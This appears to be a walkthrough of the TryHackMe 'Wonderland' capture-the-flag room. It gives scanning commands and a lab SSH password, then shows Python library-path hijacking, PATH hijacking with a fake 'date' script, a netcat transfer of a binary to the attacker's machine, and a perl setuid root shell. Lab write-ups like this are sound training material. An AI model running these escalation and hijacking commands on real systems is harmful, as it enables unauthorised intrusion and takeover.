Wonderland

Room Link: https://tryhackme.com/room/wonderland

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

I can see I'm on the right track on the browser

Kali

gobuster dir -u http://$VICTIM/r/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u http://$VICTIM/r/a -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

After a few letters I was able to just guess the word it's spelling out

TCP/22 - SSH

Kali

ssh alice@$VICTIM
Pass: HowDothTheLittleCrocodileImproveHisShiningTail

Lateral Movement - Abusing Library path

Victim

sudo -l
cat /home/alice/walrus_and_the_carpenter.py

Using the first command we can see the path it follows, we can see the first thing it will try is the current directory so we can make a random.py script of our own and put anything we want in it.

Victim

python3 -c 'import sys; print (sys.path)'
locate random.py

Victim

echo 'import os' > random.py
echo 'os.system("/bin/bash")' >> random.py
cat random.py

Victim

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Lateral Movement - Abusing Paths

Kali(receiving)

nc -l -p 1234 > teaParty

Victim(sending)

nc -w 3 $KALI 1234 < teaParty

Ghidra

I opened the file in Ghidra and can see that the program is running the date command which we see outputted when we run the script. But note that the date command isn't using the full path so if we add somewhere else in our path we can run our own date command instead.

I added tmp to my path

Victim(rabbit)

echo $PATH
export PATH=/tmp:$PATH
echo $PATH

I'm not the hatter

Victim(rabbit)

cd /tmp
echo '#!/bin/bash' > date
echo '/bin/bash' >> date
chmod +x date
cat date
/home/rabbit/teaParty

Privilege Escalation

Victim(hatter)

We can just follow what's under capabilities but only the last command as CAP_SETID is already set for perl.

Exploit: https://gtfobins.github.io/gtfobins/perl/

getcap -r / 2>/dev/null
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

PreviousBoiler CTFNextBlog

Last updated